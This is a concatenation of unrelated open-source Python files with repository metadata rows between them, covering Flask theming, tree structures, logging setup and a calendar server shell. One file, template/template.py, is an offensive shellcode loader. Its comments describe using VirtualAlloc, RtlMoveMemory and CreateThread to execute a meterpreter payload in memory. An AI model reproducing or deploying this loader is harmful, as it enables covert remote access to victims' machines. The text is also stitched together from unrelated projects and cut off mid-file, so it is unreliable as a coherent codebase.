self.dCfg = {}
# self.__dCfgVars = {}
self.dCfg['__seccion__'] = seccion
self.logger.debug("seccion(%(sec)s)" % {'sec':seccion} )
def seccion(self):
self._setupLog()
if not self.dCfg or not self.dCfg.has_key('__seccion__'): return None
return self.dCfg['__seccion__']
def getCfgGroup (self,gname):
self._setupLog()
if not gname: return None
if not self.__dCfgGroups.has_key(gname): return None
return self.__dCfgGroups[gname]
def getCfgVar (self,vname):
self._setupLog()
if not vname: return None
if not self.__dCfgVars.has_key(vname): return None
return self.__dCfgVars[vname]
def setCfgVar (self,vname,val):
self._setupLog()
if not vname or not val: return False
self.__dCfgVars[vname] = val
return True
def getCfgVarFromGroup (self,gname,vname):
self._setupLog()
self.logger.debug("%s gname(%s) vname(%s) sobre __dCfgGroup(%s)"%(self.seccion(),gname,vname,self.__dCfgGroups))
if not gname: return None
if not self.__dCfgGroups.has_key(gname): return None
if type(self.__dCfgGroups[gname]) is not DictType: return None
if not self.__dCfgGroups[gname].has_key(vname): return None
return self.__dCfgGroups[gname][vname]
def setCfgVarFromGroup (self,gname,vname,val):
self._setupLog()
self.logger.debug("%s gname(%s) vname(%s) sobre dCfg(%s)"%(self.seccion(),gname,vname,self.dCfg))
if not gname or not vname or not self.__dCfgGroups.has_key(gname) or \
type(self.__dCfgGroups[gname]) is not DictType : return False
self.__dCfgGroups[gname][vname] = val
return True
def getVar(self,gname,vname = None):
self._setupLog()
if not vname and gname:
vname = gname
gname = None
if not vname: return None
self.logger.debug("%s vname(%s) gname(%s) sobre dCfg(%s)"%(self.seccion(),vname,gname,self.dCfg))
if gname and vname :
if not self.dCfg.has_key(gname) or \
type(self.dCfg[gname]) is not DictType or \
not self.dCfg[gname].has_key(vname): return None
return self.dCfg[gname][vname]
else:
if not self.dCfg.has_key(vname): return None
return self.dCfg[vname]
def param(self,param):
#First we normalize the parameter.
#self.logger.debug("%s con aliases tot %s " % (param,self._aliases))
if param in self._aliases.keys(): vars = self._aliases[param] + [param]
else: vars = [param]
aTmp = []
for v in vars:
rval = self.getVar(v)
self.logger.debug("buscando %s nos da %s " % (v,rval))
if not rval and v == vars[-1]:
rval = self.getCfgVar(v)
self.logger.debug("Ahora si que lo buscamos en el general %s nos da %s " % (v,rval))
if not rval and len(aTmp):
self.logger.debug("Buscando los resstos: %s " % (aTmp))
for ts in aTmp:
self.logger.debug("we are going to use ... %s " % (ts))
rval = ts
break
else:
tmpstr = self.getCfgVar(v)
if tmpstr: aTmp.append(tmpstr)
if rval: break
if not rval: return rval
if param in ('disposition',):
if rval in ('adjunto',): rval = 'attachment'
elif rval in ('interno','in','dentro'): rval = 'inline'
else: rval = 'attachment'
return rval
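# Resolution sketch for param('disposition'), assuming a section that sets
# 'disposicion = adjunto' (the alias declared in _aliases above):
#   1. the aliases expand the lookup order to ['disposicion', 'disposition']
#   2. getVar()/getCfgVar() are probed in that order until a value is found
#   3. the Spanish value 'adjunto' is normalized to 'attachment'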
class Job:
dTipos = None
params = None
logger = None
#TODO: this list needs to change from static to a dynamic list. That is,
# there needs to be a way of registering entries/classes as a module is
# imported. So there would be a config path on which module paths to load
# and when loading them, they would add whatever classes to a tuple
extractores = {
'sql':extractors.SQLFileQuery,
'html':extractors.HTMLFetch,
'web':extractors.HTMLFetch,
'sqltoweb':extractors.SQLValuesToWebFetch,
'system':extractors.SysExec
}
formateadores = {
'csv':formatters.CSVFormat,
'text':formatters.TextFormat,
'txt':formatters.TextFormat,
'html':formatters.HTMLFormat,
'xls':formatters.ExcelFormat
}
Extractor = None
Formatter = None
def __init__(self,config):
self.logger = logging.getLogger(str(self.__class__))
if config:
self.logger.debug("Asignando el atributo params ..")
self.params = config
#self.logger.debug("hecho. ahora vamos a cargar los parametros ")
#self._load()
tipo = self.params.get(self.params.seccion(),'extractor')
logger = logging.getLogger(str(self.__class__))
if not tipo:
raise Exception(str(self.__class__)+"::factory wrong argument tipo :"+str(tipo))
if tipo not in self.extractores.keys():
raise Exception("Tipo "+str(tipo)+" desconocido ")
try:
## The job should really receive 3 type parameters: 1) the extractor to use 2) the formatter to use 3) the transport to use (and run it)
## perhaps this class should be a Wrapper that then calls the rest.
## That way we would probably avoid the inconsistency of having a factory that builds instances which are not defined at preprocessing time
self.Extractor = self.extractores[tipo](config)
except Exception, e:
self.logger.exception("Excepcion creando el tipo %s con clase %s " % (tipo,self.extractores[tipo]))
# traceback.print_exc()
raise e
oTmpMsg = MIMEText("Error en %s : %s " % (config.seccion(),str(e)),'plain','ISO-8859-15')
def run(self):
try:
self.logger.debug("%s : Calling extract ..." % (self.params.seccion()))
self.extract()
self.logger.debug("%s : Calling format ..." % (self.params.seccion()))
self.format()
self.logger.debug("%s : Execution (includes formatting) finished!" % (self.params.seccion()))
except Exception,e:
self.logger.exception("%s : problems Extracting and Formatting data." % (self.params.seccion()))
raise e
def extract(self):
self.Extractor.extract()
def format(self):
## Here we have to check configuration and select the appropriate class
try:
fmt = self.params.get(self.params.seccion(),'formatter')
self.logger.debug("format %s with extractor %s and params %s " % (fmt,self.Extractor,self.params))
self.Formatter = self.formateadores[fmt](self.Extractor,self.params)
except Exception,e:
self.logger.exception("%s : Problems loading formatter" % (self.params.seccion()))
#self.logger.exception("%s : Problems loading formatter %s " % (self.params.seccion(),fmt))
raise e
def getMimeResult(self):
if not self.Formatter:
txt = "%s : no formatter available , can't get Mime " % (self.params.seccion())
self.logger.error(txt)
raise Exception("%s : no formatter available , can't get Mime " % (self.params.seccion()))
return self.Formatter.getMimeResult()
def close(self):
self.Formatter.close()
|
gpl-2.0
| -723,263,891,476,053,800 | 44.307829 | 171 | 0.535365 | false |
small-yellow-rice/qt
|
quokka_themes/__init__.py
|
1
|
18620
|
# -*- coding: utf-8 -*-
"""
Quokka-Themes
=============
This provides infrastructure for theming support in your Quokka applications.
It takes care of:
- Loading themes
- Rendering their templates
- Serving their static media
- Letting themes reference their templates and static media
:based on: 2013 Christopher Carter, 2012 Drew Lustro, 2010 Matthew "LeafStorm" Frazier
:license: MIT/X11, see LICENSE for details
"""
from __future__ import with_statement
from .version import __version__
## Yarg, here be pirates!
from operator import attrgetter
import itertools
import os
import os.path
import re
import logging
from flask import (Module, send_from_directory, render_template, json,
abort, url_for, Blueprint)
# Support >= Flask 0.9
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
from jinja2 import contextfunction
from jinja2.loaders import FileSystemLoader, BaseLoader, TemplateNotFound
from werkzeug import cached_property
logger = logging.getLogger()
DOCTYPES = 'html4 html5 xhtml'.split()
IDENTIFIER = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
containable = lambda i: i if hasattr(i, '__contains__') else tuple(i)
def starchain(i):
return itertools.chain(*i)
def active_theme(ctx):
if '_theme' in ctx:
return ctx['_theme']
elif ctx.name.startswith('_themes/'):
return ctx.name[8:].split('/', 1)[0]
else:
raise RuntimeError("Could not find the active theme")
@contextfunction
def global_theme_template(ctx, templatename, fallback=True):
theme = active_theme(ctx)
templatepath = '_themes/%s/%s' % (theme, templatename)
if (not fallback) or template_exists(templatepath):
return templatepath
else:
return templatename
@contextfunction
def global_theme_static(ctx, filename, external=False):
theme = active_theme(ctx)
return static_file_url(theme, filename, external)
@contextfunction
def global_theme_get_info(ctx, attribute_name, fallback=''):
theme = get_theme(active_theme(ctx))
try:
info = getattr(theme, attribute_name)
if info is None:
raise AttributeError("Got None for getattr(theme, '{0}')".format(attribute_name))
return info
except AttributeError:
pass
return theme.options.get(attribute_name, fallback)
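# Inside a theme's Jinja templates these globals are used roughly like this
# (a sketch; 'base.html' and 'style.css' are hypothetical theme files):
#
#   {% extends theme('base.html') %}
#   <link rel="stylesheet" href="{{ theme_static('style.css') }}">
#   <title>{{ theme_get_info('name', 'Untitled theme') }}</title>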
def static_file_url(theme, filename, external=False):
"""
This is a shortcut for getting the URL of a static file in a theme.
:param theme: A `Theme` instance or identifier.
:param filename: The name of the file.
:param external: Whether the link should be external or not. Defaults to
`False`.
"""
if isinstance(theme, Theme):
theme = theme.identifier
return url_for('_themes.static', themeid=theme, filename=filename,
_external=external)
def render_theme_template(theme, template_name, _fallback=True, **context):
"""
This renders a template from the given theme. For example::
return render_theme_template(g.user.theme, 'index.html', posts=posts)
If `_fallback` is True and the template does not exist within the theme,
it will fall back on trying to render the template using the application's
normal templates. (The "active theme" will still be set, though, so you
can try to extend or include other templates from the theme.)
:param theme: Either the identifier of the theme to use, or an actual
`Theme` instance.
:param template_name: The name of the template to render.
:param _fallback: Whether to fall back to the application's default templates
"""
if not isinstance(theme, (list, tuple)):
theme = [theme]
logger.debug("Rendering template")
logger.debug("theme {} - template {} - fallback {} - context {}".format(
theme, template_name, _fallback, context))
if not isinstance(template_name, (list, tuple)):
template_name = [template_name]
last = template_name.pop()
themes = theme
for name in template_name:
for theme in themes:
if isinstance(theme, Theme):
theme = theme.identifier
context['_theme'] = theme
try:
logger.debug(
"trying to render {} in {}".format(name, theme)
)
return render_template('_themes/%s/%s' % (theme, name),
**context)
except TemplateNotFound:
logger.debug("{} not found in {}, trying next...".format(name, theme))
continue
if _fallback:
logger.debug("Fallback to app templates folder")
for name in template_name:
try:
logger.debug(
"trying to render {} in app templates".format(name))
return render_template(name, **context)
except TemplateNotFound:
logger.debug("{} not found, trying next...".format(name))
continue
for theme in themes:
if isinstance(theme, Theme):
theme = theme.identifier
context['_theme'] = theme
try:
logger.debug("Trying to load last template {} in {}".format(last, theme))
return render_template('_themes/%s/%s' % (theme, last), **context)
except TemplateNotFound:
continue
if _fallback:
logger.debug("Trying to load last template {} in app templates".format(last))
return render_template(last, **context)
logger.debug("Template {} not found".format(last))
raise
### convenience #########################################################
def get_theme(ident):
"""
This gets the theme with the given identifier from the current app's
theme manager.
:param ident: The theme identifier.
"""
ctx = stack.top
return ctx.app.theme_manager.themes[ident]
def get_themes_list():
"""
This returns a list of all the themes in the current app's theme manager,
sorted by identifier.
"""
ctx = stack.top
return list(ctx.app.theme_manager.list_themes())
def static(themeid, filename):
try:
ctx = stack.top
theme = ctx.app.theme_manager.themes[themeid]
except KeyError:
abort(404)
return send_from_directory(theme.static_path, filename)
def template_exists(templatename):
ctx = stack.top
return templatename in containable(ctx.app.jinja_env.list_templates())
### loaders #############################################################
def list_folders(path):
"""
This is a helper function that only returns the directories in a given
folder.
:param path: The path to list directories in.
"""
return (name for name in os.listdir(path)
if os.path.isdir(os.path.join(path, name)))
def load_themes_from(path):
"""
This is used by the default loaders. You give it a path, and it will find
valid themes and yield them one by one.
:param path: The path to search for themes in.
"""
for basename in (b for b in list_folders(path) if IDENTIFIER.match(b)):
try:
t = Theme(os.path.join(path, basename))
except Exception:
pass
else:
if t.identifier == basename:
yield t
def packaged_themes_loader(app):
"""
This theme will find themes that are shipped with the application. It will
look in the application's root path for a ``themes`` directory - for
example, the ``someapp`` package can ship themes in the directory
``someapp/themes/``.
"""
themes_path = os.path.join(app.root_path, 'themes')
if os.path.exists(themes_path):
return load_themes_from(themes_path)
else:
return ()
def theme_paths_loader(app):
"""
This checks the app's `THEME_PATHS` configuration variable to find
directories that contain themes. The theme's identifier must match the
name of its directory.
"""
theme_paths = app.config.get('THEME_PATHS', ())
if isinstance(theme_paths, basestring):
theme_paths = [p.strip() for p in theme_paths.split(';')]
return starchain(
load_themes_from(path) for path in theme_paths
)
class ThemeTemplateLoader(BaseLoader):
"""
This is a template loader that loads templates from the current app's
loaded themes.
"""
def __init__(self, as_blueprint=False):
self.as_blueprint = as_blueprint
BaseLoader.__init__(self)
def get_source(self, environment, template):
if self.as_blueprint and template.startswith("_themes/"):
template = template[8:]
try:
themename, templatename = template.split('/', 1)
ctx = stack.top
theme = ctx.app.theme_manager.themes[themename]
except (ValueError, KeyError):
raise TemplateNotFound(template)
try:
return theme.jinja_loader.get_source(environment, templatename)
except TemplateNotFound:
raise TemplateNotFound(template)
def list_templates(self):
res = []
ctx = stack.top
fmt = '_themes/%s/%s'
for ident, theme in ctx.app.theme_manager.themes.iteritems():
res.extend((fmt % (ident, t)).encode("utf8")
for t in theme.jinja_loader.list_templates())
return res
#########################################################################
themes_blueprint = Blueprint('_themes', __name__, url_prefix='/_themes')
themes_blueprint.jinja_loader = ThemeTemplateLoader(True)
themes_blueprint.add_url_rule('/<themeid>/<path:filename>', 'static', view_func=static)
class Themes:
""" This is the main class you will use to interact
with Flask-Themes2 on your app.
It really only implements the bare minimum, the rest
is passed through to other methods and classes.
"""
def __init__(self, app=None, **kwargs):
""" If given an app, this will simply call
init_themes, and pass through all kwargs
to init_themes, making it super easy.
:param app: the `~flask.Flask` instance to setup themes for.
:param \*\*kwargs: keyword args to pass through to init_themes
"""
if app is not None:
self._app = app
self.init_themes(self._app, **kwargs)
else:
self._app = None
def init_themes(self, app, loaders=None, app_identifier=None,
manager_cls=None, theme_url_prefix="/_themes"):
""" This sets up the theme infrastructure by adding a `ThemeManager` to the
given app and registering the module/blueprint containing the views and
templates needed.
:param app: The `~flask.Flask` instance to set up themes for.
:param loaders: An iterable of loaders to use. It defaults to `packaged_themes_loader` and `theme_paths_loader`.
:param app_identifier: The application identifier to use. If not given, it defaults to the app's import name.
:param manager_cls: If you need a custom manager class, you can pass it in here.
:param theme_url_prefix: The prefix to use for the URLs on the themes module. (Defaults to ``/_themes``.)
"""
if app_identifier is None:
app_identifier = app.import_name
if manager_cls is None:
manager_cls = ThemeManager
manager_cls(app, app_identifier, loaders=loaders)
app.jinja_env.globals['theme'] = global_theme_template
app.jinja_env.globals['theme_static'] = global_theme_static
app.jinja_env.globals['theme_get_info'] = global_theme_get_info
app.register_blueprint(themes_blueprint, url_prefix=theme_url_prefix)
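# Minimal setup sketch (assumes a Flask app object named `app`; the
# identifier must match each theme's info.json 'application' key):
#
#   from quokka_themes import Themes, render_theme_template
#   Themes(app, app_identifier='quokka')
#   # later, inside a view:
#   #   return render_theme_template('mytheme', 'index.html', posts=posts)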
class ThemeManager(object):
"""
This is responsible for loading and storing all the themes for an
application. Calling `refresh` will cause it to invoke all of the theme
loaders.
A theme loader is simply a callable that takes an app and returns an
iterable of `Theme` instances. You can implement your own loaders if your
app has another way to load themes.
:param app: The app to bind to. (Each instance is only usable for one
app.)
:param app_identifier: The value that the info.json's `application` key
is required to have. If you require a more complex
check, you can subclass and override the
`valid_app_id` method.
:param loaders: An iterable of loaders to use. The defaults are
`packaged_themes_loader` and `theme_paths_loader`, in that
order.
"""
def __init__(self, app, app_identifier, loaders=None):
self.bind_app(app)
self.app_identifier = app_identifier
self._themes = None
#: This is a list of the loaders that will be used to load the themes.
self.loaders = []
if loaders:
self.loaders.extend(loaders)
else:
self.loaders.extend((packaged_themes_loader, theme_paths_loader))
@property
def themes(self):
"""
This is a dictionary of all the themes that have been loaded. The keys
are the identifiers and the values are `Theme` objects.
"""
if self._themes is None:
self.refresh()
return self._themes
def list_themes(self):
"""
This yields all the `Theme` objects, in sorted order.
"""
return sorted(self.themes.itervalues(), key=attrgetter('identifier'))
def bind_app(self, app):
"""
If an app wasn't bound when the manager was created, this will bind
it. The app must be bound for the loaders to work.
:param app: A `~flask.Flask` instance.
"""
self.app = app
app.theme_manager = self
def valid_app_id(self, app_identifier):
"""
This checks whether the application identifier given will work with
this application. The default implementation checks whether the given
identifier matches the one given at initialization.
:param app_identifier: The application identifier to check.
"""
return self.app_identifier == app_identifier
def refresh(self):
"""
This loads all of the themes into the `themes` dictionary. The loaders
are invoked in the order they are given, so later themes will override
earlier ones. Any invalid themes found (for example, if the
application identifier is incorrect) will be skipped.
"""
self._themes = {}
for theme in starchain(ldr(self.app) for ldr in self.loaders):
if self.valid_app_id(theme.application):
self.themes[theme.identifier] = theme
class Theme(object):
"""
This contains a theme's metadata.
:param path: The path to the theme directory.
"""
def __init__(self, path):
#: The theme's root path. All the files in the theme are under this
#: path.
self.path = os.path.abspath(path)
with open(os.path.join(self.path, 'info.json')) as fd:
self.info = i = json.load(fd)
#: The theme's name, as given in info.json. This is the human
#: readable name.
self.name = i['name']
#: The application identifier given in the theme's info.json. Your
#: application will probably want to validate it.
self.application = i['application']
#: The theme's identifier. This is an actual Python identifier,
#: and in most situations should match the name of the directory the
#: theme is in.
self.identifier = i['identifier']
#: The human readable description. This is the default (English)
#: version.
self.description = i.get('description')
#: This is a dictionary of localized versions of the description.
#: The language codes are all lowercase, and the ``en`` key is
#: preloaded with the base description.
self.localized_desc = dict(
(k.split('_', 1)[1].lower(), v) for k, v in i.items()
if k.startswith('description_')
)
self.localized_desc.setdefault('en', self.description)
#: The author's name, as given in info.json. This may or may not
#: include their email, so it's best just to display it as-is.
self.author = i['author']
#: A short phrase describing the license, like "GPL", "BSD", "Public
#: Domain", or "Creative Commons BY-SA 3.0".
self.license = i.get('license')
#: A URL pointing to the license text online.
self.license_url = i.get('license_url')
#: The URL to the theme's or author's Web site.
self.website = i.get('website')
#: The theme's preview image, within the static folder.
self.preview = i.get('preview')
#: The theme's doctype. This can be ``html4``, ``html5``, or ``xhtml``
#: with html5 being the default if not specified.
self.doctype = i.get('doctype', 'html5')
#: The theme's version string.
self.version = i.get('version')
#: Any additional options. These are entirely application-specific,
#: and may determine other aspects of the application's behavior.
self.options = i.get('options', {})
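# A minimal info.json matching the fields parsed above (a sketch; values are
# illustrative, and only name, application, identifier and author are
# mandatory here):
#
#   {
#     "name": "Calm Blue",
#     "application": "quokka",
#     "identifier": "calmblue",
#     "author": "Jane Doe <jane@example.com>",
#     "description": "A calm blue theme",
#     "doctype": "html5",
#     "options": {"accent": "#3366cc"}
#   }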
@cached_property
def static_path(self):
"""
The absolute path to the theme's static files directory.
"""
return os.path.join(self.path, 'static')
@cached_property
def templates_path(self):
"""
The absolute path to the theme's templates directory.
"""
return os.path.join(self.path, 'templates')
@cached_property
def license_text(self):
"""
The contents of the theme's license.txt file, if it exists. This is
used to display the full license text if necessary. (It is `None` if
there was not a license.txt.)
"""
lt_path = os.path.join(self.path, 'license.txt')
if os.path.exists(lt_path):
with open(lt_path) as fd:
return fd.read()
else:
return None
@cached_property
def jinja_loader(self):
"""
This is a Jinja2 template loader that loads templates from the theme's
``templates`` directory.
"""
return FileSystemLoader(self.templates_path)
|
mit
| -4,202,205,206,850,931,700 | 33.609665 | 124 | 0.614017 | false |
Disguisenberg/Metastasis-Framework
|
template/template.py
|
1
|
2293
|
import ctypes
# ctypes makes it very simple to interact with the Windows API from a Python script, so it is a required import for this template. It provides C compatible data types and allows calling functions in DLLs or shared libraries
shellcode = (
);
# Shellcode - paste the payload bytes above; they will be copied into memory and executed, granting an SSL-certified meterpreter session
# We will be using 4 Win32 APIs to execute the shellcode; these APIs are central to dynamic memory management on Windows platforms
ptr = ctypes.windll.kernel32.VirtualAlloc(0,4096,ctypes.c_int(0x1000),ctypes.c_int(0x40))
# First, the VirtualAlloc() call creates a new executable memory region; we then copy our shellcode into it and execute it
b = bytearray() # use a bytearray() so the shellcode is handled as mutable bytes under Python 3 as well
b.extend(map(ord, shellcode))
buf = (ctypes.c_char * len(shellcode)).from_buffer(b)
# Constructs a ctypes char buffer the size of our shellcode, backed by the bytearray
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# RtlMoveMemory() function accepts 3 arguments, a pointer to the destination (returned from VirtualAlloc()), a pointer to the memory to be copied and the number of bytes to be copied,in our case the size of the shellcode
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# CreateThread() accepts 6 arguments; in our case the third one is the important one: a pointer to the application-defined function to be executed by the thread (the address returned by VirtualAlloc()). If the function succeeds, the return value is a handle to the new thread.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
# WaitForSingleObject() accepts 2 arguments: the handle to the object (returned by CreateThread()) and the time-out interval in milliseconds (-1 means INFINITE, i.e. wait until the thread finishes)
|
mit
| 2,696,099,267,623,453,000 | 90.72 | 277 | 0.685565 | false |
JudoWill/glue
|
glue/core/tree.py
|
1
|
9288
|
from __future__ import absolute_import, division, print_function
import numpy as np
__all__ = ['Tree', 'NewickTree', 'DendroMerge']
class Tree(object):
"""
Base class for hierarchical segmentations of data sets.
The tree is represented by its root node, which contains reference
to 0 or more children nodes.
Attributes
----------
id: Integer
An identifier for this node.
parent: Tree instance
A reference to this node's parent, if any
value:
A value associated with this node
children: List of Tree instances
The children of this node
index_map: Component instance
The tree id to which each element in the
original data belongs.
"""
def __init__(self, id=None, value=None, index_map=None):
"""
Create a new Tree object.
Parameters
----------
id: Integer
Id of the tree
value:
Value of the tree
index_map: Component instance
index_map of the data
Raises
------
TypeError: if any of the inputs are the wrong type
"""
if (id is not None):
try:
id = int(id)
except ValueError:
raise TypeError("Input id must be in integer")
self.id = id
self.value = value
self.children = []
self.parent = None
self.index_map = index_map
self._index = None
def add_child(self, child):
"""
Add a new child node to this tree.
This is the preferred way for building trees, as it takes care
of input checking and linking between parent and child. Do not
append to the children attribute directly.
Parameters
----------
child: Tree instance
The child to add
Raises
------
TypeError: If the input is not a Tree instance
"""
if (not isinstance(child, Tree)):
raise TypeError("Child must be a tree instance")
self.children.append(child)
child.parent = self
def to_newick(self):
"""
Convert the tree to a newick string
Returns
-------
A newick string representation of the tree
"""
result = ''
if (self.children):
result = '(' + ','.join([c.to_newick()[0:-1]
for c in self.children]) + ')'
if (self.id is not None):
result += ('%s' % self.id)
if (self.value is not None):
result += (':%s' % self.value)
return result + ';'
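# Quick sanity example (a sketch):
#   root = Tree(id=0); root.add_child(Tree(id=1)); root.add_child(Tree(id=2))
#   root.to_newick()  # -> '(1,2)0;'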
@property
def index(self):
"""
A flattened index of all the nodes at and below this
branch
This property is a dictionary holding each node in the
tree, keyed by the node ids. Index will only work if the node
id's are unique.
The user of the index is responsible for making sure that the
tree hasn't changed since the index was created.
"""
if self._index is not None:
return self._index
self._index = {}
stack = [self]
while stack:
s = stack.pop()
if s.id in self._index:
raise KeyError("Cannot index this tree -- "
"node id's are non-unique")
self._index[s.id] = s
for c in s.children:
stack.append(c)
return self._index
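# Usage sketch: once the node ids are unique, any node can be fetched in
# O(1) time, e.g. node = tree.index[3] returns the node whose id is 3.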
def get_subtree_indices(self):
result = []
stack = [self]
while stack:
s = stack.pop()
result.append(s.id)
stack += s.children
return result
def get_leaves(self):
# get_subtree_indices() returns node ids rather than nodes, so each id
# is resolved through the index before checking for children
st = self.get_subtree_indices()
return [self.index[x] for x in st if len(self.index[x].children) == 0]
def get_ancestors(self):
if self.parent is None:
return []
result = [self.parent]
while result[-1].parent is not None:
result.append(result[-1].parent)
return result
class NewickTree(Tree):
"""
A subclass of Tree, which generates trees from Newick Strings.
Attributes
----------
newick: The newick string
"""
def __init__(self, newick, index_map=None):
"""
Create a new tree from a newick string representation of a
tree
Attributes
----------
newick: String
The newick string
index_map: Component
The index map of the data
"""
self.newick = newick
self.__validateNewick()
(id, value) = self.__parse_id_value()
Tree.__init__(self, index_map=index_map,
id=id, value=value)
self.__parse_children()
def __validateNewick(self):
"""
Ensure that the supplied string represents a valid Newick
description.
Raises
------
ValueError: If the newick string is invalid
"""
pass
def __parse_id_value(self):
"""
Parse the root node id and value
Returns
-------
The root's id and value, as a list
"""
newick = self.newick
first = max([newick.rfind(')'),
newick.rfind(',')]) + 1
comma = newick.find(',', first)
if comma == -1:
comma = len(newick) - 1
paren = newick.find(')', first)
if paren == -1:
paren = len(newick) - 1
last = min([paren, comma])
mid = newick.find(':', first)
if (mid != -1):
id = newick[first:mid]
value = newick[mid + 1:last]
else:
id = newick[first:last]
value = None
return (id, value)
def __parse_children(self):
"""
Find and parse the children of the root.
This method recursively builds the tree, and populates the
root's children attribute.
Side Effects
------------
Any children currently stored in the root's children list are
erased.
"""
newick = self.newick
if newick[0] != '(':
return
depth = 0
start = 1
self.children = []
for i in range(1, len(newick)):
if (newick[i] == '('):
depth += 1
elif (newick[i] == ')' and depth != 0):
depth -= 1
elif ((newick[i] == ',' or newick[i] == ')')
and depth == 0):
child = NewickTree(newick[start:i] + ';',
index_map=self.index_map)
self.add_child(child)
start = i + 1
class DendroMerge(Tree):
"""
A dendrogram created from a merge array.
The merge array is a [nleaf - 1, 2] array where the ith row lists
the 2 nodes merged to form node nleaf + i. This data structure is
used in many older dendrogram creation tools (e.g., that of
Rosolowsky et al. 2008ApJ...679.1338R)
"""
def __init__(self, merge_list,
index_map=None, _id=-1):
"""
Create a new DendroMerge tree
Parameters
----------
merge_list: numpy array
a [nleaf - 1, 2] merge list (see class description above)
index_map: Component
See Tree documentation
"""
if(_id == -1):
self.validate_mergelist(merge_list)
nleaf = merge_list.shape[0] + 1
_id = 2 * nleaf - 2
else:
nleaf = merge_list.shape[0] + 1
Tree.__init__(self, id=_id,
index_map=index_map)
# base case: leaf
if (_id < nleaf):
return
# recursive case: branch. Create children
else:
c1 = min(merge_list[_id - nleaf, :])
c2 = max(merge_list[_id - nleaf, :])
c1 = DendroMerge(merge_list,
index_map=index_map,
_id=c1)
c2 = DendroMerge(merge_list,
index_map=index_map,
_id=c2)
self.add_child(c1)
self.add_child(c2)
def validate_mergelist(self, merge_list, msg=None):
"""
Ensure that merge_list is a valid merge list
A valid merge_list is a [nleaf - 1, 2] numpy array,
that includes the numbers 0 through 2 * nleaf - 3
exactly once.
Parameters
----------
merge_list: ndarray instance
Raises
------
TypeError: If the merge_list is invalid
"""
if (not isinstance(merge_list, np.ndarray)):
raise TypeError("Invalid mergelist: not a numpy array")
if (merge_list.shape[1] != 2):
raise TypeError("Invalid mergelist: not a 2 column array")
f = merge_list.flatten()
if (len(f) != len(set(f))):
raise TypeError("Invalid mergelist: contains duplicates")
if ((min(f) != 0) or (max(f) != len(f) - 1)):
raise TypeError("Invalid mergelist: does not "
"run from 0-nleaf")
|
bsd-3-clause
| -7,541,047,189,419,370,000 | 26.560831 | 75 | 0.502369 | false |
lemieuxl/pyGenClean
|
pyGenClean/__init__.py
|
1
|
1723
|
# This file is part of pyGenClean.
#
# pyGenClean is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# pyGenClean is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# pyGenClean. If not, see <http://www.gnu.org/licenses/>.
import logging
try:
from .version import pygenclean_version as __version__
except ImportError:
__version__ = None
__author__ = "Louis-Philippe Lemieux Perreault"
__copyright__ = "Copyright 2014, Beaulieu-Saucier Pharmacogenomics Centre"
__credits__ = ["Louis-Philippe Lemieux Perreault", "Marc-Andre Legault"]
__license__ = "GPL"
__maintainer__ = "Louis-Philippe Lemieux Perreault"
__email__ = "louis-philippe.lemieux.perreault@statgen.org"
__status__ = "Development"
# Configuring logging
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s %(name)s %(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
def add_file_handler_to_root(log_fn):
"""Adds a file handler to the root logging.
:param log_fn: the name of the log file.
:type log_fn: str
"""
file_handler = logging.FileHandler(log_fn, mode="w")
file_handler.setFormatter(logging.Formatter(
fmt="[%(asctime)s %(name)s %(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
))
logging.root.addHandler(file_handler)
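# Usage sketch (the log file name is illustrative): mirror console logging
# into a file.
#   add_file_handler_to_root("pyGenClean.log")
#   logging.info("this line reaches both the console and pyGenClean.log")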
|
gpl-3.0
| -5,714,978,892,215,041,000 | 29.767857 | 79 | 0.69704 | false |
trevor/calendarserver
|
calendarserver/tools/shell/cmd.py
|
1
|
21936
|
##
# Copyright (c) 2011-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Data store commands.
"""
__all__ = [
"UsageError",
"UnknownArguments",
"CommandsBase",
"Commands",
]
from getopt import getopt
from twext.python.log import Logger
from twisted.internet.defer import succeed
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.conch.manhole import ManholeInterpreter
from txdav.common.icommondatastore import NotFoundError
from calendarserver.version import version
from calendarserver.tools.tables import Table
from calendarserver.tools.purge import PurgePrincipalService
from calendarserver.tools.shell.vfs import Folder, RootFolder
from calendarserver.tools.shell.directory import findRecords, summarizeRecords, recordInfo
log = Logger()
class UsageError(Exception):
"""
Usage error.
"""
class UnknownArguments(UsageError):
"""
Unknown arguments.
"""
def __init__(self, arguments):
UsageError.__init__(self, "Unknown arguments: %s" % (arguments,))
self.arguments = arguments
class InsufficientArguments(UsageError):
"""
Insufficient arguments.
"""
def __init__(self):
UsageError.__init__(self, "Insufficient arguments.")
class CommandsBase(object):
"""
Base class for commands.
@ivar protocol: a protocol for parsing the incoming command line.
@type protocol: L{calendarserver.tools.shell.terminal.ShellProtocol}
"""
def __init__(self, protocol):
self.protocol = protocol
self.wd = RootFolder(protocol.service)
@property
def terminal(self):
return self.protocol.terminal
#
# Utilities
#
def documentationForCommand(self, command):
"""
@return: the documentation for the given C{command} as a
string.
"""
m = getattr(self, "cmd_%s" % (command,), None)
if m:
doc = m.__doc__.split("\n")
# Throw out first and last line if it's empty
if doc:
if not doc[0].strip():
doc.pop(0)
if not doc[-1].strip():
doc.pop()
